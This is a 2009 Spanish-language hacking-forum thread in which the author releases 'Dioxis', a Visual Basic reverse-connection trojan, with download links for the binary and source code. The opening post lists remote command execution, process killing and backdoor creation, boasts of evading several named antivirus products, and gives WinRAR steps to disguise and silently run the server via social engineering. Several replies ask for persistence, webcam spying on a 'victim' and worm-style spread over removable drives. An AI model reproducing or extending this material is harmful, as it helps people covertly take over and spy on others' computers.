Título: [Vb] Dioxis: Conexion Inversa by 50l3r Publicado por: 50l3r en 22 Mayo 2009, 18:09 pm (http://img42.imageshack.us/img42/2879/79744795.png) Abstenganse Virustotal ;) Tamaño servidor: 408 KB (Compilado con Winsck.ocx & dioxis.exe(servidor)) Tamaño Cliente: 544 KB Archivos: Cliente Dioxis y libreria winsck.ocx Lenguaje: Visual Basic 6.0 Conexion: Inversa Tiempo de Reconexion: Personalizada Tiempo de Refresco de fin de conexion: 1 segundo Idioma: Español Puerto usado: 666 Infraestructura: Red Local e internet Funciones automatizadas: Ejecucion de:
Matanza de Procesos:
Creacion de Puertas Traseras:
Sistema:
¿Que es Dioxis? Dioxis, a pesar de su simple interfaz, es un troyano de conexion inversa. Utiliza la funcion shell, para ejecutar acciones, estas acciones estan divididas en 4 partes: Modo Custom: Es el modo personalizado, si tienes ya conocimientos de lo que puedes hacer con "Ejecutar:" puedes escribir tus ordenes aqui para que sean procesadas en el ordenador remoto (http://img43.imageshack.us/img43/3223/95107441.png) Modo Funny: Es el modo divetido ^^. Puedes haces acciones tales como ejecutar paint, mandar mensajes, ponerle la tipica pelicula de star wars en modo ascii...etc (http://img198.imageshack.us/img198/4279/85794886.png) Modo Normal: Este modo esta dedicado a la matanza de procesos que corren en el pc remoto y a abrir paginas web o cerrar sesion, un poco mas cruel que el funny mod (http://img132.imageshack.us/img132/3693/44772942.png) Modo Dioxis: El dioxis mod, seria en teoria la forma mas cruel de usar este software, consta ge generar backdoors, apagar el pc, eliminar el hal.dll...etc He evitado en este modo hacer las cosas crueles ya que este software aun no es detectado ^^ abstenganse gente cruel :P (http://img33.imageshack.us/img33/9901/24026978.png) Demostracion Aqui os dejo unos minutos de la demostracion del troyano, es la 1 version, no la actualizada, pero no cambia mucho OGYbd5xoMxg ¿Detectado? El unico antivirus que hasta ahora me ha dado algun problema es el poco conocido avira, que lo detecta por heuristica pero te deja seguir trabajando con el, asi que si tienes una buena ingenieria social, podras colarselo, a continuacion los antivirus pasados: Kapersky 2009 (http://img36.imageshack.us/img36/4894/kav.jpg) Nod32 (http://img38.imageshack.us/img38/9144/nod.jpg) Norton 2009 (http://img41.imageshack.us/img41/9661/nortonh.jpg) Panda global protection 2009 (http://img269.imageshack.us/img269/6073/pandar.jpg) Avast En este no tengo imagen, ya que nada mas analizarlo la ventana se cierra Por ahora esos antivirus son con los que lo analize, si deseais que lo analize con otros me comentais Otros Datos:
Instrucciones: El Troyano consta de cliente y servidor, el servidor se crea con el cliente, y puede que necesite de la libreria de winsock (viene adjuntada con el software), asi que una vez creado el server seguid estos pasos: 1: Instalar el WINRAR (http://www.winrar.es/descargas) y coged los archivos servidor y la libreria 2: Una vez tenemos el servidor y la libreria, cogemos los dos y con el winrar y le damos a añadir archivo, nos aparecera una ventana asi: (http://img36.imageshack.us/img36/9161/82034703.jpg) Le dais a crear archivo ejecutable o en mi caso a create sfx archive, el metodo de compresion que sea el mejor 3: A continuacion vete a la pestaña avanzado, te aparecerá esta ventana: (http://img37.imageshack.us/img37/4268/79940891.jpg) te vas a opciones de autoejecutable o sfx options 4: Te volvera a salir otra pestaña para poder decir el directorio en donde se instalara, y que se ejcutara antes o despues de la extraccion, rellenar segun la imagen (http://img190.imageshack.us/img190/7466/24607822.jpg) 5: En la pestaña modos, selecciona segun la imagen, sobreescribir archivos y esconder todo (http://img34.imageshack.us/img34/6033/qweq.jpg) 6: En esta pestaña podreis cambiar el icono de la aplicacion, luego das a aceptar todo y ya tendreis vuestro server (http://img38.imageshack.us/img38/4490/95741942.jpg) (http://img29.imageshack.us/img29/4756/descargarw.png) (http://www.fileden.com/files/2008/3/2/1791774/di0xis.rar) (http://img268.imageshack.us/img268/5946/descargar2.png) (http://www.fileden.com/files/2008/3/2/1791774/iconos.rar) Descargar codigo fuente (http://www.fileden.com/files/2008/3/2/1791774/codigo%20fuente.rar) Título: Re: [Vb] Dioxis: Conexion Inversa by 50l3r Publicado por: braulio-- en 22 Mayo 2009, 22:17 pm Te felicito, al final lo has conseguido. :)
Título: Re: [Vb] Dioxis: Conexion Inversa by 50l3r Publicado por: 50l3r en 22 Mayo 2009, 22:20 pm yeah, me costo pero si, aun asi me falta mejorarle unas cosas ya que cuando se descoencta el servidor, el cliente no muestra la desconexion, fallo grave
Título: Re: [Vb] Dioxis: Conexion Inversa by 50l3r Publicado por: Man-In-the-Middle en 22 Mayo 2009, 22:55 pm No lo he provado, pero que tu interfaz mola mola!, y esta bien xhio esto Modo Dioxis XD
Título: Re: [Vb] Dioxis: Conexion Inversa by 50l3r Publicado por: Karcrack en 22 Mayo 2009, 22:58 pm :D
Buen curro! Me gusta la interfaz... como se llama el Oso Rosa ese? ;D Lo que no me gusta es que cada vez que cambias de sección has de escuchar... porque? :xD Bueno, ahora preguntas especificas:
Sigue así, llegarás lejos ;) Saludos ;D PD: Para la próxima pon algún TextBox más :xD, Me refiero para preguntar,por ejemplo, el proceso a ser eliminado, no solo los que tengan los botones ;) Título: Re: [Vb] Dioxis: Conexion Inversa by 50l3r Publicado por: 50l3r en 22 Mayo 2009, 23:03 pm si te refieres al numero de fichero que necesita, pues nada mas el server y el ocx del winsock para el que no lo tenga, esta compilado con el winrar jaja
El espacio es de 10 segundos, esta hecho con un timer pero vamos que se puede agrandar si el numero de clientes es elevado si, lenguaje vb, con la version del programa 6.0 jaja eso sobraba pero weno a mi tampoco me gusta lo de que se reconecta todo el rato, porque como son diferentes formularios tuve que hacer diferentes controles winsock para cada uno, eso no sabia como arreglarlo ains el oso rosa asesion es el famoso gloomy miren jeje: http://images.google.es/images?client=firefox-a&rls=org.mozilla%3Aes-ES%3Aofficial&hl=es&q=gloomy&btnG=Buscar+im%C3%A1genes&gbv=2&aq=f&oq= porcierto puse una duda en vb6, quiero que el cliente genere el servidor, es decir que puedas cambiar la ip a la que va el servidor para que no todas vayan a m dominio no-ip, sino que la gente lo use para ellos, haber si me podeis ayudar y cuando acabe eso lo pongo solucionado el error de que cuando el usuario se descnecta, no avisaba Título: Re: [Vb] Dioxis: Conexion Inversa by 50l3r Publicado por: Myth.ck en 22 Mayo 2009, 23:31 pm si, lenguaje vb, con la version del programa 6.0 jaja eso sobraba pero weno Nunca pensé que vb podía llegar a ser tan peligroso junto a tus manos. :o Congratulations! ;-) Título: Re: [Vb] Dioxis: Conexion Inversa by 50l3r Publicado por: Karcrack en 22 Mayo 2009, 23:38 pm Lo de la versión del VB no sobraba, ya que esta VB .NET :P
Cuando digo Peso me refiero a los KB que ocupa... si va todo empacado con WinRar... seran unos 20kb? :-\ ;) si, lenguaje vb, con la version del programa 6.0 jaja eso sobraba pero weno Nunca pensé que vb podía llegar a ser tan peligroso junto a tus manos. :o Congratulations! ;-) Título: Re: [Vb] Dioxis: Conexion Inversa by 50l3r Publicado por: Myth.ck en 22 Mayo 2009, 23:43 pm ;) Ahora queda corroborado que a vb no hay que menospreciarlo...
Título: Re: [Vb] Dioxis: Conexion Inversa by 50l3r Publicado por: 50l3r en 22 Mayo 2009, 23:52 pm batch tambien es menospreciado, y solo estamos hablando de batch, hay gente que hace juegos convoy a poner mas datos del software, entre ellos el peso y demas
Título: Re: [Vb] Dioxis: Conexion Inversa by 50l3r Publicado por: Fran_Al en 22 Mayo 2009, 23:56 pm bua..simplemente perfecto! estoy deseando de poder descargarlo :D:D
felicidades por el aporte y muxas gracias 1 saludo Título: Re: [Vb] Dioxis: Conexion Inversa by 50l3r Publicado por: 50l3r en 23 Mayo 2009, 00:06 am ahber si consigo crear en el cliente el servidor y sera todo vuestro, pero no lo subais a virustotal, y si vuestro antivirus envia los datos al servidor, no lo analizeis tampoco
Título: Re: [Vb] Dioxis: Conexion Inversa by 50l3r Publicado por: ~~ en 23 Mayo 2009, 14:20 pm Citar porcierto puse una duda en vb6, quiero que el cliente genere el servidor, es decir que puedas cambiar la ip a la que va el servidor para que no todas vayan a m dominio no-ip, sino que la gente lo use para ellos, haber si me podeis ayudar y cuando acabe eso lo pongo http://foro.elhacker.net/index.php/topic,171824.0.html Buen trabajo, para ser tu primer proyecto no pinta nada mal ;) Puedes escanear el server aquí: http://scanner.novirusthanks.org/index.php?options=1 Marcando la opción de no distribuir sin ningún problema (en cuanto la web esté on) Salu2 Título: Re: [Vb] Dioxis: Conexion Inversa by 50l3r Publicado por: 50l3r en 24 Mayo 2009, 00:15 am he visto el proyecto que has hecho ese que muestras en tu post eon, pero no entiendo mucho, en ese que generas el servidor desde el cliente?
eso es lo que deseo yo quiero poner en el cliente un boton que te pregunte, a que ip quieres vincular el server?, pones una y te genera el server con esa ip, pero ahi no llego a entender mucho, haber si me puedes ayudar Título: Re: [Vb] Dioxis: Conexion Inversa by 50l3r Publicado por: ~~ en 24 Mayo 2009, 01:41 am Lo que tienes que hacer es guardar el servidor en los recursos del cliente, cuando quieras generar un servidor lo extraes y le añades al final (en el EOF) la ip, el puerto o lo que tu quieras y luego desde el servidor lees esa información y la utilizas ;)
Título: Re: [Vb] Dioxis: Conexion Inversa by 50l3r Publicado por: andres_5 en 24 Mayo 2009, 02:30 am muy bueno, S0l3r, solo vi el programa una vez en foto y me gusto, cuando lo vi en accion en el video, me kedao flipao =D ... te a kedao perfecto ;)
Título: Re: [Vb] Dioxis: Conexion Inversa by 50l3r Publicado por: K-19 en 24 Mayo 2009, 04:11 am Inconvenientes: al parecer no es multiconexión, tiene opciones inutiles para lamear y al parecer lo has hecho casi sacandolo de los pappers que circulan por ahi no? añadiendole un aspecto visual eso si.
Como trabajo para aprender está bien, pero de ahí a querer publicarlo en plan "aquí teneis mi troyano" lo veo exagerado. Título: Re: [Vb] Dioxis: Conexion Inversa by 50l3r Publicado por: hitori batusai en 24 Mayo 2009, 05:07 am k-19 hablar es facil, donde esta el tuyo???
muy buen trabajo un poco cruel algunas opciones pero muy buen trabajo XD Título: Re: [Vb] Dioxis: Conexion Inversa by 50l3r Publicado por: Edegaru_Kun en 24 Mayo 2009, 07:44 am Pues a pesar de lo que se diga, a mi me parece un trabajo genial, y con muchos puntos a favor: Interfaz agradable, extremadamente ligero y sencillo, indetectable...
Te felicito por tu esfuerzo chaval, un proyecto realmente bueno. Título: Re: [Vb] Dioxis: Conexion Inversa by 50l3r Publicado por: Karcrack en 24 Mayo 2009, 11:07 am Inconvenientes: al parecer no es multiconexión, tiene opciones inutiles para lamear y al parecer lo has hecho casi sacandolo de los pappers que circulan por ahi no? añadiendole un aspecto visual eso si. Como trabajo para aprender está bien, pero de ahí a querer publicarlo en plan "aquí teneis mi troyano" lo veo exagerado. K-19, si te fijas en la primera imagen que hay en el post inicial dice 'BIENVENIDO A LA SENCILLEZ' asi que, entiendo que no se quieres hacer un PoisonIvy/Bifrost/SpyNet... :laugh: Saludos ;) Título: Re: [Vb] Dioxis: Conexion Inversa by 50l3r Publicado por: 50l3r en 24 Mayo 2009, 13:41 pm aji estamos jeje, he empezado hace 2 semanas en este mundillo, me lei entero el manual de aprenda vb como si estuviera en primer y de ahi en adelante empecé a investigar yo solo
el troyano no esta hecho siguiendo un tutorial, lo que si, me inspiro el manual de Xenon, unicamente la primera parte, aun sigo leyendo el tutorial pero lo sigo por mi parte, como un manual mas y no copiando el codigo, y si hay alguna parte que no se investigo hasta dar la causa Tengo esto en mente para que el cliente me genere el server clicando en un boton Que por un inputbox te pida la ip a la que se vaya el server y luego genere todo el server en un exe y luego lo guarde en una ruta con un common dialog pero como hago para guardar unicamente el server al darle al boton? para resumir, quiero hacerlo como el bifrost, que te genere el cliente el servidor Título: Re: [Vb] Dioxis: Conexion Inversa by 50l3r Publicado por: jackl007 en 24 Mayo 2009, 15:36 pm Mi pregunta es porque se reinicia la conexion cuando pasas al modo funny? (asi aprecie el video)...
y que pasa cuando tienes 10 victimas que quieren conectarse? implementa las multiples conexiones al estilo poison ivy, bifrost ... seria mejor ;) Título: Re: [Vb] Dioxis: Conexion Inversa by 50l3r Publicado por: 50l3r en 24 Mayo 2009, 15:37 pm Pondre para que podais cambiar el intervalo del timer, por si teneis muchos pcs remotos
luego el corte de conexion, eso se debe a que no puedo controlar los 4 formularios con un winsock control, sino no se cortaria Título: Re: [Vb] Dioxis: Conexion Inversa by 50l3r Publicado por: Karcrack en 24 Mayo 2009, 17:00 pm Pondre para que podais cambiar el intervalo del timer, por si teneis muchos pcs remotos Claro que puedes...luego el corte de conexion, eso se debe a que no puedo controlar los 4 formularios con un winsock control, sino no se cortaria Código :rolleyes: Título: Re: [Vb] Dioxis: Conexion Inversa by 50l3r Publicado por: 50l3r en 24 Mayo 2009, 17:03 pm muchas gracias por la sugerencia, ya lo arregle
ya esta activa la descarga Título: Re: [Vb] Dioxis: Conexion Inversa by 50l3r Publicado por: Karcrack en 24 Mayo 2009, 21:24 pm Buen trabajo ;D Por lo visto te gusta el Diseño Gráfico xD... haces imágenes para todo :laugh:
Mis sugerencias:
Bueno, creo que nada mas... :P Por cierto, que hace lo de BackDoor? Saludos ;) Título: Re: [Vb] Dioxis: Conexion Inversa by 50l3r Publicado por: 50l3r en 24 Mayo 2009, 21:31 pm aun me meti en vsual basic, tengo que aprender un poquito mas para cifrar todo el trafico
luego el estilo de w$ cual es? no se de su existencia jeje, soy noob en usar el api del winsock a que te refieres el taskkill porque canta? gracias por dar tu opinion, ayudas a que mi software evolucione ^^ por cierto el mensaje al crear el server sale: (http://img198.imageshack.us/img198/5742/84430625.jpg) justo cuando le das a la mariquita, ademas tienes otra oportunidad despues de poner la ip y el tiempo de reconexion, te enseña los datos si dices si lo crea sino no Título: Re: [Vb] Dioxis: Conexion Inversa by 50l3r Publicado por: Karcrack en 24 Mayo 2009, 22:02 pm Te digo lo del Estilo de Windows... (W$).. porque los que no tenemos temas como el tuyo (El de Mac) nos salen los botones tipo Windows 95... así que mírate esto:
Código: http://www.elguille.info/vb/ejemplos/temasXPvb6.htm Saludos ;) Título: Re: [Vb] Dioxis: Conexion Inversa by 50l3r Publicado por: 50l3r en 24 Mayo 2009, 22:12 pm bueno, pongo el codigo fuente, que me dijo eon que lo tenia que poner
Título: Re: [Vb] Dioxis: Conexion Inversa by 50l3r Publicado por: jackl007 en 25 Mayo 2009, 05:46 am Si estas aprendiendo es bueno que lo pongas, a lo mejor alguioen qe tiene tiempo se da el trabajo de leerlo y sugerirte mejores cosas...
Por cierto, tambien puedes usar una matriz de Winsock para hacer multiples conexiones a la vez Título: Re: [Vb] Dioxis: Conexion Inversa by 50l3r Publicado por: warner2009 en 20 Septiembre 2009, 00:34 am Buen Proyecto 50l3r, me fije bien y los comentarios son viejazos :-(
- Pero igual sigue siendo indetectable jajajaja.... he visto troyanos de paga y que no menos de 4 semanas ya todo antivirus lo detecta, y este dioxis es gratis, y casi nadie lo conoce y como dura el microbio jajajajajajja... aguante dioxis -------------------------------------------------------------------------- ;-) ;-) ;-) ;-) ;-) ;-) ;-) ;-) ;-) ;-) ;-) ;-) ;-) ;-) ;-) ;-) ;-) ;-) ;-) ;-) ;-) ------------------------------------------------------------------------------ By Buking (actualizando)2009 Título: Re: [Vb] Dioxis: Conexion Inversa by 50l3r Publicado por: uv3 en 24 Septiembre 2009, 21:44 pm Bueno antes que nada felicitar al creador por este impecable, sencillo y efectivo SOFT. Un lujito la verdad ya lo he provado y funciona.
El server por ahora lo prove con NOD 32, y es indetectable por este. Me preguntaba si se podria de alguna manera hacer que este server , se ejecutara cada vez que la victima iniciara sesion en el PC ? , y se que se puede, asi que voy a intentarlo. Si a alguno se le ocurre algo rapido y efectivo agradecido estoy. Porque la verdad lo que mas me interesa es espiar a la victima y no tanto perjudicarla o darle a conocer que esta siendo espiada. Taria bueno agregar funciones tales como, observar su camara web y su escritorio y cosas asi, mas privadas ^^ ! . Sin mas saludos y gracias. Título: Re: [Vb] Dioxis: Conexion Inversa by 50l3r Publicado por: 50l3r en 24 Septiembre 2009, 23:27 pm este troyano ya va por la version 5 jejeje
esta es la primera si no me equivoco http://foro.elhacker.net/analisis_y_diseno_de_malware/vb_dioxis_trojan_conexion_inversa_by_50l3r-t255645.0.html;new;topicseen#new aqui tienes la utlima, tiene mas cosas y etc, la primera version estara detetadisima, o eso creo ya que no lo uso Título: Re: [Vb] Dioxis: Conexion Inversa by 50l3r Publicado por: uv3 en 25 Septiembre 2009, 04:17 am Jaja sii, luego de descargarme este, seguir recorriendo el foro y vi la version 5 lite que porsupuesto , descarga y probe , y aun mas contento quede !! (rima y todo ). Re bueno el soft.
PD: Yo fui el del mail del ocx, aunque me di maña y lo arregle (por suerte , ya que era una boberia), aunque luego entre al la casilla y vi que me habias dado ya la solucion jajaj !! un groso !!. Saludos. No tengo muchos conocimientos de troyanos, pero bueno ! estoy a pasos de terminar la carrera Analista Programador y no es que diga algo con esto, solo que algo se ! ^^. PD2: Seria posible blindarle al servidor algun codigo como para que se agregue al registro, y se inicie a cada inicio de sesion de la "v1ctima".? Si logro hacerlo luego tengo pensado tambien agregarle algun codigo estilo w0rm, para que se propague por unidades extraibles jeje !, bue se me ha abierto un abanico de ideas jeje !! Saludos.. me pondre en carrera !! Título: Re: [Vb] Dioxis: Conexion Inversa by 50l3r Publicado por: 50l3r en 25 Septiembre 2009, 15:10 pm xd el server se ejecuta en cada inicio
xD, todas las versiones lo hacen, solo que no se agrega al registro :P Título: Re: [Vb] Dioxis: Conexion Inversa by 50l3r Publicado por: carlosmarban en 9 Julio 2010, 00:49 am yeah, me costo pero si, aun asi me falta mejorarle unas cosas ya que cuando se descoencta el servidor, el cliente no muestra la desconexion, fallo grave Hola, disculpa soy nuevo en esto, ya descargue los archivos, pero no puedo hacer que arranque, como creo el server?? podrias ayudarme porfa, de antemano muchas gracias. =) Título: Re: [Vb] Dioxis: Conexion Inversa by 50l3r Publicado por: carlosmarban en 9 Julio 2010, 00:51 am Ayuda por favor!!! No puedo crear el server, =( ya me decspere!!! alguien que me ayude gracias. :(
Título: Re: [Vb] Dioxis: Conexion Inversa by 50l3r Publicado por: 50l3r en 9 Julio 2010, 08:16 am esto es la primera version, actualizate, entra en la web oficial ya que la version mas reciente no se encuentra aqui
descarga este archivo de internet: comdlg32.ocx la pagina es 50l3r-labs.skimdoo.com y por cierto, no revivas posts viejos, basta con crear uno nuevo saludos Título: Re: [Vb] Dioxis: Conexion Inversa by 50l3r Publicado por: Karcrack en 9 Julio 2010, 12:51 pm Cierro el tema, cualquier duda le enviais un MP al creador ;)
|